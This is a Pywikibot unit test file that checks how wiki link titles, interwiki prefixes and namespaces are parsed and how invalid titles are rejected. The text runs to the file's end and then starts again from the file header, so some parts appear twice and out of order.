config.mylang = 'en'
config.family = 'wikipedia'
link = Link(':testwiki:wikidata:Talk:Q6')
link.parse()
self.assertEqual(link.site, self.get_site('wikidata'))
self.assertEqual(link.title, 'Q6')
self.assertEqual(link.namespace, 1)
def test_fully_qualified_NS0_family(self):
"""Test ':wikidata:testwiki:Q6' on enwp is namespace 0."""
config.mylang = 'en'
config.family = 'wikipedia'
link = Link(':wikidata:testwiki:Q6')
link.parse()
self.assertEqual(link.site, self.get_site('test.wp'))
self.assertEqual(link.title, 'Q6')
self.assertEqual(link.namespace, 0)
def test_fully_qualified_NS1_family(self):
"""Test ':wikidata:testwiki:Talk:Q6' on enwp is namespace 1."""
config.mylang = 'en'
config.family = 'wikipedia'
link = Link(':wikidata:testwiki:Talk:Q6')
link.parse()
self.assertEqual(link.site, self.get_site('test.wp'))
self.assertEqual(link.title, 'Q6')
self.assertEqual(link.namespace, 1)
class TestFullyQualifiedOneSiteFamilyExplicitLinkParser(LinkTestCase):
"""Test links to one site target family."""
family = 'species'
code = 'species'
cached = True
def test_fully_qualified_NS0_code(self):
"""Test ':species:species:Main Page' on species is namespace 0."""
config.mylang = 'en'
config.family = 'wikipedia'
link = Link(':species:species:Main Page')
link.parse()
self.assertEqual(link.site, self.get_site())
self.assertEqual(link.title, 'Main Page')
self.assertEqual(link.namespace, 0)
def test_fully_qualified_NS1_code(self):
"""Test ':species:species:Talk:Main Page' on species is namespace 1."""
config.mylang = 'en'
config.family = 'wikipedia'
link = Link(':species:species:Talk:Main Page')
link.parse()
self.assertEqual(link.site, self.get_site())
self.assertEqual(link.title, 'Main Page')
self.assertEqual(link.namespace, 1)
# ---- Tests of a Link without colons, which shouldn't be interwikis, follow.
class TestPartiallyQualifiedImplicitLinkSameSiteParser(LinkTestCase):
"""Test partially qualified links to same site."""
family = 'wikipedia'
code = 'en'
cached = True
def test_partially_qualified_NS0_code(self):
"""Test 'wikipedia:Main Page' on enwp is namespace 4."""
config.mylang = 'en'
config.family = 'wikipedia'
link = Link('wikipedia:Main Page')
link.parse()
self.assertEqual(link.site, self.get_site())
self.assertEqual(link.title, 'Main Page')
self.assertEqual(link.namespace, 4)
def test_partially_qualified_NS1_code(self):
"""Test 'wikipedia:Talk:Main Page' on enwp is namespace 4."""
config.mylang = 'en'
config.family = 'wikipedia'
link = Link('wikipedia:Talk:Main Page')
link.parse()
self.assertEqual(link.site, self.get_site())
self.assertEqual(link.title, 'Talk:Main Page')
self.assertEqual(link.namespace, 4)
def test_partially_qualified_NS0_family(self):
"""Test 'en:Main Page' on enwp is namespace 0."""
config.mylang = 'en'
config.family = 'wikipedia'
link = Link('en:Main Page')
link.parse()
self.assertEqual(link.site, self.get_site())
self.assertEqual(link.title, 'Main Page')
self.assertEqual(link.namespace, 0)
def test_partially_qualified_NS1_family(self):
"""Test 'en:Talk:Main Page' on enwp is namespace 1."""
config.mylang = 'en'
config.family = 'wikipedia'
link = Link('en:Talk:Main Page')
link.parse()
self.assertEqual(link.site, self.get_site())
self.assertEqual(link.title, 'Main Page')
self.assertEqual(link.namespace, 1)
class TestPartiallyQualifiedImplicitLinkDifferentCodeParser(LinkTestCase):
"""Test partially qualified links to different code."""
family = 'wikipedia'
code = 'en'
cached = True
def test_partially_qualified_NS0_family(self):
"""Test 'en:Main Page' on dewp is namespace 0."""
config.mylang = 'de'
config.family = 'wikipedia'
link = Link('en:Main Page')
link.parse()
self.assertEqual(link.site, self.get_site())
self.assertEqual(link.title, 'Main Page')
self.assertEqual(link.namespace, 0)
def test_partially_qualified_NS1_family(self):
"""Test 'en:Talk:Main Page' on dewp is namespace 1."""
config.mylang = 'de'
config.family = 'wikipedia'
link = Link('en:Talk:Main Page')
link.parse()
self.assertEqual(link.site, self.get_site())
self.assertEqual(link.title, 'Main Page')
self.assertEqual(link.namespace, 1)
class TestPartiallyQualifiedImplicitLinkDifferentFamilyParser(LinkTestCase):
"""Test partially qualified links to different family."""
family = 'wikipedia'
code = 'en'
cached = True
def test_partially_qualified_NS0_code(self):
"""Test 'wikipedia:Main Page' on enws is namespace 0."""
config.mylang = 'en'
config.family = 'wikisource'
link = Link('wikipedia:Main Page')
link.parse()
self.assertEqual(link.site, self.get_site())
self.assertEqual(link.title, 'Main Page')
self.assertEqual(link.namespace, 0)
def test_partially_qualified_NS1_code(self):
"""Test 'wikipedia:Talk:Main Page' on enws is ns 1."""
config.mylang = 'en'
config.family = 'wikisource'
link = Link('wikipedia:Talk:Main Page')
link.parse()
self.assertEqual(link.site, self.get_site())
self.assertEqual(link.title, 'Main Page')
self.assertEqual(link.namespace, 1)
class TestFullyQualifiedImplicitLinkSameFamilyParser(LinkTestCase):
"""Link tests."""
family = 'wikipedia'
code = 'en'
cached = True
def test_fully_qualified_NS0_code(self):
"""Test 'en:wikipedia:Main Page' on enwp is namespace 4."""
config.mylang = 'en'
config.family = 'wikipedia'
link = Link('en:wikipedia:Main Page')
link.parse()
self.assertEqual(link.site, self.get_site())
self.assertEqual(link.title, 'Main Page')
self.assertEqual(link.namespace, 4)
def test_fully_qualified_NS1_code(self):
"""Test 'en:wikipedia:Talk:Main Page' on enwp is namespace 4."""
config.mylang = 'en'
config.family = 'wikipedia'
link = Link('en:wikipedia:Talk:Main Page')
link.parse()
self.assertEqual(link.site, self.get_site())
self.assertEqual(link.title, 'Talk:Main Page')
self.assertEqual(link.namespace, 4)
class TestFullyQualifiedImplicitLinkDifferentFamilyParser(LinkTestCase):
"""Test link to a different family without preleading colon."""
sites = {
'enws': {
'family': 'wikisource',
'code': 'en'
},
'enwp': {
'family': 'wikipedia',
'code': 'en'
}
}
cached = True
def test_fully_qualified_NS0_code(self):
"""Test 'en:wikipedia:Main Page' on enws is namespace 0."""
config.mylang = 'en'
config.family = 'wikisource'
link = Link('en:wikipedia:Main Page')
link.parse()
self.assertEqual(link.site, self.get_site('enwp'))
self.assertEqual(link.title, 'Main Page')
self.assertEqual(link.namespace, 0)
def test_fully_qualified_NS1_code(self):
"""Test 'en:wikipedia:Main Page' on enws is namespace 1."""
config.mylang = 'en'
config.family = 'wikisource'
link = Link('en:wikipedia:Talk:Main Page')
link.parse()
self.assertEqual(link.site, self.get_site('enwp'))
self.assertEqual(link.title, 'Main Page')
self.assertEqual(link.namespace, 1)
def test_fully_qualified_NS0_family(self):
"""Test 'wikipedia:en:Main Page' on enws is namespace 0."""
config.mylang = 'en'
config.family = 'wikisource'
link = Link('wikipedia:en:Main Page')
link.parse()
self.assertEqual(link.site, self.get_site('enwp'))
self.assertEqual(link.title, 'Main Page')
self.assertEqual(link.namespace, 0)
def test_fully_qualified_NS1_family(self):
"""Test 'wikipedia:en:Talk:Main Page' on enws is namespace 1."""
config.mylang = 'en'
config.family = 'wikisource'
link = Link('wikipedia:en:Talk:Main Page')
link.parse()
self.assertEqual(link.site, self.get_site('enwp'))
self.assertEqual(link.title, 'Main Page')
self.assertEqual(link.namespace, 1)
class TestFullyQualifiedImplicitLinkNoLangConfigFamilyParser(LinkTestCase):
"""Test implicit link from family without lang code to other family."""
sites = {
'wikidata': {
'family': 'wikidata',
'code': 'wikidata'
},
'enwp': {
'family': 'wikipedia',
'code': 'en'
}
}
cached = True
def test_fully_qualified_NS0_code(self):
"""Test 'en:wikipedia:Main Page' on wikidata is namespace 4."""
config.mylang = 'wikidata'
config.family = 'wikidata'
link = Link('en:wikipedia:Main Page')
link.parse()
self.assertEqual(link.site, self.get_site('enwp'))
self.assertEqual(link.title, 'Main Page')
self.assertEqual(link.namespace, 4)
def test_fully_qualified_NS1_code(self):
"""Test 'en:wikipedia:Talk:Main Page' on wikidata isn't namespace 1."""
config.mylang = 'wikidata'
config.family = 'wikidata'
link = Link('en:wikipedia:Talk:Main Page')
link.parse()
self.assertEqual(link.site, self.get_site('enwp'))
self.assertEqual(link.title, 'Talk:Main Page')
self.assertEqual(link.namespace, 4)
def test_fully_qualified_NS0_family(self):
"""Test 'wikipedia:en:Main Page' on wikidata is namespace 0."""
config.mylang = 'wikidata'
config.family = 'wikidata'
link = Link('wikipedia:en:Main Page')
link.parse()
self.assertEqual(link.site, self.get_site('enwp'))
self.assertEqual(link.namespace, 0)
self.assertEqual(link.title, 'Main Page')
def test_fully_qualified_NS1_family(self):
"""Test 'wikipedia:en:Talk:Main Page' on wikidata is namespace 1."""
config.mylang = 'wikidata'
config.family = 'wikidata'
link = Link('wikipedia:en:Talk:Main Page')
link.parse()
self.assertEqual(link.site, self.get_site('enwp'))
self.assertEqual(link.title, 'Main Page')
self.assertEqual(link.namespace, 1)
class TestFullyQualifiedNoLangFamilyImplicitLinkParser(LinkTestCase):
"""Test wikibase links without preleading colon."""
family = 'wikidata'
code = 'test'
cached = True
def test_fully_qualified_NS0_code(self):
"""Test 'testwiki:wikidata:Q6' on enwp is namespace 0."""
config.mylang = 'en'
config.family = 'wikipedia'
link = Link('testwiki:wikidata:Q6')
link.parse()
self.assertEqual(link.site, pywikibot.Site('wikidata', 'wikidata'))
self.assertEqual(link.title, 'Q6')
self.assertEqual(link.namespace, 0)
def test_fully_qualified_NS1_code(self):
"""Test 'testwiki:wikidata:Talk:Q6' on enwp is namespace 1."""
config.mylang = 'en'
config.family = 'wikipedia'
link = Link('testwiki:wikidata:Talk:Q6')
link.parse()
self.assertEqual(link.site, pywikibot.Site('wikidata', 'wikidata'))
self.assertEqual(link.title, 'Q6')
self.assertEqual(link.namespace, 1)
def test_fully_qualified_NS0_family(self):
"""Test 'wikidata:testwiki:Q6' on enwp is namespace 0."""
config.mylang = 'en'
config.family = 'wikipedia'
link = Link('wikidata:testwiki:Q6')
link.parse()
self.assertEqual(link.site, pywikibot.Site('test', 'wikipedia'))
self.assertEqual(link.title, 'Q6')
self.assertEqual(link.namespace, 0)
def test_fully_qualified_NS1_family(self):
"""Test 'wikidata:testwiki:Talk:Q6' on enwp is namespace 1."""
config.mylang = 'en'
config.family = 'wikipedia'
link = Link('wikidata:testwiki:Talk:Q6')
link.parse()
self.assertEqual(link.site, pywikibot.Site('test', 'wikipedia'))
self.assertEqual(link.title, 'Q6')
self.assertEqual(link.namespace, 1)
class TestFullyQualifiedOneSiteFamilyImplicitLinkParser(LinkTestCase):
"""Test links to one site target family without preleading colon."""
family = 'species'
code = 'species'
cached = True
def test_fully_qualified_NS0_family_code(self):
"""Test 'species:species:Main Page' on enwp is namespace 0."""
config.mylang = 'en'
config.family = 'wikipedia'
link = Link('species:species:Main Page')
link.parse()
self.assertEqual(link.site, self.get_site())
self.assertEqual(link.title, 'Main Page')
self.assertEqual(link.namespace, 0)
def test_fully_qualified_NS1_family_code(self):
"""Test 'species:species:Talk:Main Page' on enwp is namespace 1."""
config.mylang = 'en'
config.family = 'wikipedia'
link = Link('species:species:Talk:Main Page')
link.parse()
self.assertEqual(link.site, self.get_site())
self.assertEqual(link.title, 'Main Page')
self.assertEqual(link.namespace, 1)
def test_fully_qualified_NS0_code(self):
"""Test 'species:Main Page' on enwp is namespace 0."""
config.mylang = 'en'
config.family = 'wikipedia'
link = Link('species:Main Page')
link.parse()
self.assertEqual(link.site, self.get_site())
self.assertEqual(link.title, 'Main Page')
self.assertEqual(link.namespace, 0)
def test_fully_qualified_NS1_code(self):
"""Test 'species:Talk:Main Page' on enwp is namespace 1."""
config.mylang = 'en'
config.family = 'wikipedia'
link = Link('species:Talk:Main Page')
link.parse()
self.assertEqual(link.site, self.get_site())
self.assertEqual(link.title, 'Main Page')
self.assertEqual(link.namespace, 1)
class TestEmptyTitle(TestCase):
"""Test links which contain no title."""
family = 'wikipedia'
code = 'en'
def test_interwiki_mainpage(self):
"""Test that Link allow links without a title to the main page."""
link = Link('en:', self.get_site())
link.parse()
self.assertEqual(link.site, self.get_site())
self.assertEqual(link.title, '')
self.assertEqual(link.namespace, 0)
def test_interwiki_namespace_without_title(self):
"""Test that Link doesn't allow links without a title."""
link = Link('en:Help:', self.get_site())
self.assertRaisesRegex(
InvalidTitle, "'en:Help:' has no title.", link.parse)
def test_no_text(self):
"""Test that Link doesn't allow empty."""
link = Link('', self.get_site())
self.assertRaisesRegex(
InvalidTitle, 'The link does not contain a page title',
link.parse)
def test_namespace_lookalike(self):
"""Test that Link does only detect valid namespaces."""
link = Link('CAT:', self.get_site())
link.parse()
self.assertEqual(link.site, self.get_site())
self.assertEqual(link.title, 'CAT:')
self.assertEqual(link.namespace, 0)
link = Link('en:CAT:', self.get_site())
link.parse()
self.assertEqual(link.site, self.get_site())
self.assertEqual(link.title, 'CAT:')
self.assertEqual(link.namespace, 0)
class TestInvalidInterwikiLinks(WikimediaDefaultSiteTestCase):
"""Test links to non-wikis."""
family = 'wikipedia'
code = 'en'
def test_non_wiki_prefix(self):
"""Test that Link fails if the interwiki prefix is not a wiki."""
link = Link('bugzilla:1337', source=self.site)
self.assertRaisesRegex(
Error,
'bugzilla:1337 is not a local page on wikipedia:en, and the '
'interwiki prefix bugzilla is not supported by Pywikibot!',
link.parse)
def test_other_wiki_prefix(self):
"""Test that Link fails if the interwiki prefix is a unknown family."""
link = Link('bulba:this-will-never-work', source=self.site)
self.assertRaisesRegex(
Error,
'bulba:this-will-never-work is not a local page on wikipedia:en, '
'and the interwiki prefix bulba is not supported by Pywikibot!',
link.parse)
class TestSiteLink(WikimediaDefaultSiteTestCase):
"""Test parsing namespaces when creating SiteLinks."""
def _test_link(self, link, title, namespace, site_code, site_fam):
"""Test the separate contents of the link."""
self.assertEqual(link.title, title)
self.assertEqual(link.namespace, namespace)
self.assertEqual(link.site, Site(site_code, site_fam))
self.assertEqual(link.badges, [])
def test_site_link(self):
"""Test parsing of title."""
self._test_link(SiteLink('Foobar', 'enwiki'),
'Foobar', Namespace.MAIN, 'en', 'wikipedia')
self._test_link(SiteLink('Mall:!!', 'svwiki'),
'!!', Namespace.TEMPLATE, 'sv', 'wikipedia')
self._test_link(SiteLink('Vorlage:!!', 'dewikibooks'),
'!!', Namespace.TEMPLATE, 'de', 'wikibooks')
self._test_link(SiteLink('Ai Weiwei: Never Sorry', 'enwiki'),
'Ai Weiwei: Never Sorry', Namespace.MAIN,
'en', 'wikipedia')
if __name__ == '__main__': # pragma: no cover
try:
unittest.main()
except SystemExit:
pass
|
# -*- coding: utf-8 -*-
"""Test Link functionality."""
#
# (C) Pywikibot team, 2014-2019
#
# Distributed under the terms of the MIT license.
#
from __future__ import absolute_import, division, unicode_literals
import re
import pywikibot
from pywikibot import config2 as config
from pywikibot import Site
from pywikibot.page import Link, Page, SiteLink
from pywikibot.site import Namespace
from pywikibot.exceptions import Error, InvalidTitle
from tests.aspects import (
unittest,
AlteredDefaultSiteTestCase as LinkTestCase,
DefaultDrySiteTestCase,
WikimediaDefaultSiteTestCase,
TestCase,
)
class TestCreateSeparated(DefaultDrySiteTestCase):
"""Test C{Link.create_separated}."""
def _test_link(self, link, page, section, label):
"""Test the separate contents of the link."""
self.assertIs(link.site, self.site)
self.assertEqual(link.title, page)
if section is None:
self.assertIsNone(link.section)
else:
self.assertEqual(link.section, section)
if label is None:
self.assertIsNone(link.anchor)
else:
self.assertEqual(link.anchor, label)
def test(self):
"""Test combinations of parameters."""
self._test_link(Link.create_separated('Foo', self.site),
'Foo', None, None)
self._test_link(Link.create_separated('Foo', self.site, section='Bar'),
'Foo', 'Bar', None)
self._test_link(Link.create_separated('Foo', self.site, label='Baz'),
'Foo', None, 'Baz')
self._test_link(Link.create_separated('Foo', self.site, section='Bar',
label='Baz'),
'Foo', 'Bar', 'Baz')
# ---- Tests checking if the parser does (not) accept (in)valid titles
class TestLink(DefaultDrySiteTestCase):
"""
Test parsing links with DrySite.
The DrySite is using the builtin namespaces which behaviour is controlled
in this repository so namespace aware tests do work, even when the actual
default site is using completely different namespaces.
"""
def test_valid(self):
"""Test that valid titles are correctly normalized."""
site = self.get_site()
title_tests = ['Sandbox', 'A "B"', "A 'B'", '.com', '~', '"', "'",
'Foo/.../Sandbox', 'Sandbox/...', 'A~~', 'X' * 252]
for title in title_tests:
with self.subTest(title=title):
self.assertEqual(Link(title, site).title, title)
self.assertEqual(Link('Talk:Sandbox', site).title, 'Sandbox')
self.assertEqual(Link('Talk:Foo:Sandbox', site).title, 'Foo:Sandbox')
self.assertEqual(Link('File:Example.svg', site).title, 'Example.svg')
self.assertEqual(Link('File_talk:Example.svg', site).title,
'Example.svg')
self.assertEqual(Link(':A', site).title, 'A')
# Length is 256 total, but only title part matters
self.assertEqual(Link('Category:' + 'X' * 248, site).title, 'X' * 248)
self.assertEqual(Link('A%20B', site).title, 'A B')
self.assertEqual(Link('A é B', site).title, 'A é B')
self.assertEqual(Link('A é B', site).title, 'A é B')
self.assertEqual(Link('A é B', site).title, 'A é B')
self.assertEqual(Link('A B', site).title, 'A B')
self.assertEqual(Link('A   B', site).title, 'A B')
anchor_link = Link('A | B', site)
self.assertEqual(anchor_link.title, 'A')
self.assertEqual(anchor_link.anchor, ' B')
section_link = Link('A%23B', site)
self.assertEqual(section_link.title, 'A')
self.assertEqual(section_link.section, 'B')
def test_invalid(self):
"""Test that invalid titles raise InvalidTitle exception."""
exception_message_regex = (
r'^The link does not contain a page title$'
)
texts_to_test = ['', ':', '__ __', ' __ ']
for text in texts_to_test:
with self.assertRaisesRegex(
InvalidTitle,
exception_message_regex):
Link(text, self.get_site()).parse()
# Bad characters forbidden regardless of wgLegalTitleChars
def generate_contains_illegal_chars_exc_regex(text):
exc_regex = (
r'^(u|)\'{}\' contains illegal char\(s\) (u|)\'{}\'$'
.format(re.escape(text), re.escape(text[2])))
return exc_regex
texts_to_test = ['A [ B', 'A ] B', 'A { B', 'A } B', 'A < B', 'A > B']
for text in texts_to_test:
with self.assertRaisesRegex(
InvalidTitle,
generate_contains_illegal_chars_exc_regex(text)):
Link(text, self.get_site()).parse()
# URL encoding
# %XX is understood by wikimedia but not %XXXX
with self.assertRaisesRegex(
InvalidTitle,
r'^(u|)\'A%23B\' contains illegal char\(s\) (u|)\'%23\'$'):
Link('A%2523B', self.get_site()).parse()
# A link is invalid if their (non-)talk page would be in another
# namespace than the link's "other" namespace
with self.assertRaisesRegex(
InvalidTitle,
(r'The \(non-\)talk page of (u|)\'Talk:File:Example.svg\''
r' is a valid title in another namespace.')):
Link('Talk:File:Example.svg', self.get_site()).parse()
# Directory navigation
def generate_contains_dot_combinations_exc_regex(text):
exc_regex = (r'^\(contains \. / combinations\): (u|)\'{}\'$'
.format(re.escape(text)))
return exc_regex
texts_to_test = ['.', '..', './Sandbox', '../Sandbox', 'Foo/./Sandbox',
'Foo/../Sandbox', 'Sandbox/.', 'Sandbox/..']
for text in texts_to_test:
with self.assertRaisesRegex(
InvalidTitle,
generate_contains_dot_combinations_exc_regex(text)):
Link(text, self.get_site()).parse()
# Tilde
def generate_contains_tilde_exc_regex(text):
exc_regex = r'^\(contains ~~~\): (u|)\'%s\'$' % re.escape(text)
return exc_regex
texts_to_test = ['A ~~~ Name', 'A ~~~~ Signature', 'A ~~~~~ Timestamp']
for text in texts_to_test:
with self.assertRaisesRegex(
InvalidTitle,
generate_contains_tilde_exc_regex(text)):
Link(text, self.get_site()).parse()
# Overlength
def generate_overlength_exc_regex(text):
exc_regex = r'^\(over 255 bytes\): (u|)\'%s\'$' % re.escape(text)
return exc_regex
texts_to_test = [('x' * 256), ('Invalid:' + 'X' * 248)]
for text in texts_to_test:
with self.assertRaisesRegex(
InvalidTitle,
generate_overlength_exc_regex(text)):
Link(text, self.get_site()).parse()
# Namespace prefix without actual title
def generate_has_no_title_exc_regex(text):
exc_regex = r'^(u|)\'{}\' has no title\.$'.format(re.escape(text))
return exc_regex
texts_to_test = ['Talk:', 'Category: ', 'Category: #bar']
for text in texts_to_test:
with self.assertRaisesRegex(
InvalidTitle,
generate_has_no_title_exc_regex(text.strip())):
Link(text, self.get_site()).parse()
def test_relative(self):
"""Test that relative links are handled properly."""
# Subpage
page = Page(self.get_site(), 'Foo')
rel_link = Link('/bar', page)
self.assertEqual(rel_link.title, 'Foo/bar')
self.assertEqual(rel_link.site, self.get_site())
# Subpage of Page with section
page = Page(self.get_site(), 'Foo#Baz')
rel_link = Link('/bar', page)
self.assertEqual(rel_link.title, 'Foo/bar')
self.assertEqual(rel_link.site, self.get_site())
# Non-subpage link text beginning with slash
abs_link = Link('/bar', self.get_site())
self.assertEqual(abs_link.title, '/bar')
class Issue10254TestCase(DefaultDrySiteTestCase):
"""Test T102461 (Python issue 10254)."""
def setUp(self):
"""Set up test case."""
super(Issue10254TestCase, self).setUp()
self._orig_unicodedata = pywikibot.page.unicodedata
def tearDown(self):
"""Tear down test case."""
pywikibot.page.unicodedata = self._orig_unicodedata
super(Issue10254TestCase, self).tearDown()
def test_no_change(self):
"""Test T102461 (Python issue 10254) is not encountered."""
title = 'Li̍t-sṳ́'
link = Link(title, self.site)
self.assertEqual(link.title, 'Li̍t-sṳ́')
# ---- The first set of tests are explicit links, starting with a ':'.
class TestPartiallyQualifiedExplicitLinkSameSiteParser(LinkTestCase):
"""Link tests."""
family = 'wikipedia'
code = 'en'
cached = True
def test_partially_qualified_NS0_code(self):
"""Test ':wikipedia:Main Page' on enwp is namespace 4."""
config.mylang = 'en'
config.family = 'wikipedia'
link = Link(':wikipedia:Main Page')
link.parse()
self.assertEqual(link.site, self.get_site())
self.assertEqual(link.title, 'Main Page')
self.assertEqual(link.namespace, 4)
def test_partially_qualified_NS1_code(self):
"""Test ':wikipedia:Talk:Main Page' on enwp is namespace 4."""
config.mylang = 'en'
config.family = 'wikipedia'
link = Link(':wikipedia:Talk:Main Page')
link.parse()
self.assertEqual(link.site, self.get_site())
self.assertEqual(link.title, 'Talk:Main Page')
self.assertEqual(link.namespace, 4)
def test_partially_qualified_NS0_family(self):
"""Test ':en:Main Page' on enwp is namespace 0."""
config.mylang = 'en'
config.family = 'wikipedia'
link = Link(':en:Main Page')
link.parse()
self.assertEqual(link.site, self.get_site())
self.assertEqual(link.title, 'Main Page')
self.assertEqual(link.namespace, 0)
def test_partially_qualified_NS1_family(self):
"""Test ':en:Talk:Main Page' on enwp is namespace 1."""
config.mylang = 'en'
config.family = 'wikipedia'
link = Link(':en:Talk:Main Page')
link.parse()
self.assertEqual(link.site, self.get_site())
self.assertEqual(link.title, 'Main Page')
self.assertEqual(link.namespace, 1)
class TestPartiallyQualifiedExplicitLinkDifferentCodeParser(LinkTestCase):
"""Link tests."""
family = 'wikipedia'
code = 'en'
cached = True
def test_partially_qualified_NS0_family(self):
"""Test ':en:Main Page' on dewp is namespace 0."""
config.mylang = 'de'
config.family = 'wikipedia'
link = Link(':en:Main Page')
link.parse()
self.assertEqual(link.site, self.get_site())
self.assertEqual(link.title, 'Main Page')
self.assertEqual(link.namespace, 0)
def test_partially_qualified_NS1_family(self):
"""Test ':en:Talk:Main Page' on dewp is namespace 1."""
config.mylang = 'de'
config.family = 'wikipedia'
link = Link(':en:Talk:Main Page')
link.parse()
self.assertEqual(link.site, self.get_site())
self.assertEqual(link.title, 'Main Page')
self.assertEqual(link.namespace, 1)
class TestPartiallyQualifiedExplicitLinkDifferentFamilyParser(LinkTestCase):
"""Link tests."""
family = 'wikipedia'
code = 'en'
cached = True
def test_partially_qualified_NS0_code(self):
"""Test ':wikipedia:Main Page' on enws is namespace 0."""
config.mylang = 'en'
config.family = 'wikisource'
link = Link(':wikipedia:Main Page')
link.parse()
self.assertEqual(link.site, self.get_site())
self.assertEqual(link.title, 'Main Page')
self.assertEqual(link.namespace, 0)
def test_partially_qualified_NS1_code(self):
"""Test ':wikipedia:Talk:Main Page' on enws is ns 1."""
config.mylang = 'en'
config.family = 'wikisource'
link = Link(':wikipedia:Talk:Main Page')
link.parse()
self.assertEqual(link.site, self.get_site())
self.assertEqual(link.title, 'Main Page')
self.assertEqual(link.namespace, 1)
class TestFullyQualifiedSameNamespaceFamilyParser(LinkTestCase):
"""Link tests."""
family = 'wikipedia'
code = 'en'
cached = True
def test_namespace_vs_family(self):
"""Test namespace is selected before family."""
config.mylang = 'en'
config.family = 'wikipedia'
link = Link(':wikipedia:en:Main Page')
link.parse()
self.assertEqual(link.title, 'En:Main Page')
self.assertEqual(link.namespace, 4)
link = Link(':wikipedia:en:Talk:Main Page')
link.parse()
self.assertEqual(link.site, self.get_site())
self.assertEqual(link.title, 'En:Talk:Main Page')
self.assertEqual(link.namespace, 4)
class TestFullyQualifiedExplicitLinkSameFamilyParser(LinkTestCase):
"""Link tests."""
family = 'wikipedia'
code = 'en'
cached = True
def test_fully_qualified_NS0_code(self):
"""Test ':en:wikipedia:Main Page' on enwp is namespace 4."""
config.mylang = 'en'
config.family = 'wikipedia'
link = Link(':en:wikipedia:Main Page')
link.parse()
self.assertEqual(link.site, self.get_site())
self.assertEqual(link.title, 'Main Page')
self.assertEqual(link.namespace, 4)
def test_fully_qualified_NS1_code(self):
"""Test ':en:wikipedia:Talk:Main Page' on enwp is namespace 4."""
config.mylang = 'en'
config.family = 'wikipedia'
link = Link(':en:wikipedia:Talk:Main Page')
link.parse()
self.assertEqual(link.site, self.get_site())
self.assertEqual(link.title, 'Talk:Main Page')
self.assertEqual(link.namespace, 4)
class TestFullyQualifiedExplicitLinkDifferentFamilyParser(LinkTestCase):
"""Test link to a different family."""
sites = {
'enws': {
'family': 'wikisource',
'code': 'en'
},
'enwp': {
'family': 'wikipedia',
'code': 'en'
}
}
cached = True
def test_fully_qualified_NS0_code(self):
"""Test ':en:wikipedia:Main Page' on enws is namespace 0."""
config.mylang = 'en'
config.family = 'wikisource'
link = Link(':en:wikipedia:Main Page')
link.parse()
self.assertEqual(link.site, self.get_site('enwp'))
self.assertEqual(link.title, 'Main Page')
self.assertEqual(link.namespace, 0)
def test_fully_qualified_NS1_code(self):
"""Test ':en:wikipedia:Main Page' on enwp is namespace 1."""
config.mylang = 'en'
config.family = 'wikisource'
link = Link(':en:wikipedia:Talk:Main Page')
link.parse()
self.assertEqual(link.site, self.get_site('enwp'))
self.assertEqual(link.title, 'Main Page')
self.assertEqual(link.namespace, 1)
def test_fully_qualified_NS0_family(self):
"""Test ':wikipedia:en:Main Page' on enws is namespace 0."""
config.mylang = 'en'
config.family = 'wikisource'
link = Link(':wikipedia:en:Main Page')
link.parse()
self.assertEqual(link.site, self.get_site('enwp'))
self.assertEqual(link.title, 'Main Page')
self.assertEqual(link.namespace, 0)
def test_fully_qualified_NS1_family(self):
"""Test ':wikipedia:en:Talk:Main Page' on enws is namespace 1."""
config.mylang = 'en'
config.family = 'wikisource'
link = Link(':wikipedia:en:Talk:Main Page')
link.parse()
self.assertEqual(link.site, self.get_site('enwp'))
self.assertEqual(link.title, 'Main Page')
self.assertEqual(link.namespace, 1)
class TestFullyQualifiedExplicitLinkNoLangConfigFamilyParser(LinkTestCase):
"""Test link from family without lang code to a different family."""
sites = {
'wikidata': {
'family': 'wikidata',
'code': 'wikidata'
},
'enwp': {
'family': 'wikipedia',
'code': 'en'
}
}
cached = True
def test_fully_qualified_NS0_code(self):
"""Test ':en:wikipedia:Main Page' on wikidata is namespace 4."""
config.mylang = 'wikidata'
config.family = 'wikidata'
link = Link(':en:wikipedia:Main Page')
link.parse()
self.assertEqual(link.site, self.get_site('enwp'))
self.assertEqual(link.title, 'Main Page')
self.assertEqual(link.namespace, 4)
def test_fully_qualified_NS1_code(self):
"""Test ':en:wikipedia:Talk:Main Page' on wikidata is namespace 4."""
config.mylang = 'wikidata'
config.family = 'wikidata'
link = Link(':en:wikipedia:Talk:Main Page')
link.parse()
self.assertEqual(link.site, self.get_site('enwp'))
self.assertEqual(link.title, 'Talk:Main Page')
self.assertEqual(link.namespace, 4)
def test_fully_qualified_NS0_family(self):
"""Test ':wikipedia:en:Main Page' on wikidata is namespace 0."""
config.mylang = 'wikidata'
config.family = 'wikidata'
link = Link(':wikipedia:en:Main Page')
link.parse()
self.assertEqual(link.site, self.get_site('enwp'))
self.assertEqual(link.title, 'Main Page')
self.assertEqual(link.namespace, 0)
def test_fully_qualified_NS1_family(self):
"""Test ':wikipedia:en:Talk:Main Page' on wikidata is namespace 1."""
config.mylang = 'wikidata'
config.family = 'wikidata'
link = Link(':wikipedia:en:Talk:Main Page')
link.parse()
self.assertEqual(link.site, self.get_site('enwp'))
self.assertEqual(link.title, 'Main Page')
self.assertEqual(link.namespace, 1)
class TestFullyQualifiedNoLangFamilyExplicitLinkParser(LinkTestCase):
"""Test wikibase links."""
sites = {
'wikidata': {
'family': 'wikidata',
'code': 'wikidata'
},
'enwp': {
'family': 'wikipedia',
'code': 'en'
},
'test.wp': {
'family': 'wikipedia',
'code': 'test'
},
}
cached = True
def test_fully_qualified_NS0_code(self):
"""Test ':testwiki:wikidata:Q6' on enwp is namespace 0."""
config.mylang = 'en'
config.family = 'wikipedia'
link = Link(':testwiki:wikidata:Q6')
link.parse()
self.assertEqual(link.site, self.get_site('wikidata'))
self.assertEqual(link.title, 'Q6')
self.assertEqual(link.namespace, 0)
def test_fully_qualified_NS1_code(self):
"""Test ':testwiki:wikidata:Talk:Q6' on enwp is namespace 1."""
config.mylang = 'en'
config.family = 'wikipedia'
link = Link(':testwiki:wikidata:Talk:Q6')
link.parse()
self.assertEqual(link.site, self.get_site('wikidata'))
self.assertEqual(link.title, 'Q6')
self.assertEqual(link.namespace, 1)
def test_fully_qualified_NS0_family(self):
"""Test ':wikidata:testwiki:Q6' on enwp is namespace 0."""
config.mylang = 'en'
config.family = 'wikipedia'
link = Link(':wikidata:testwiki:Q6')
link.parse()
self.assertEqual(link.site, self.get_site('test.wp'))
self.assertEqual(link.title, 'Q6')
self.assertEqual(link.namespace, 0)
def test_fully_qualified_NS1_family(self):
"""Test ':wikidata:testwiki:Talk:Q6' on enwp is namespace 1."""
config.mylang = 'en'
config.family = 'wikipedia'
link = Link(':wikidata:testwiki:Talk:Q6')
link.parse()
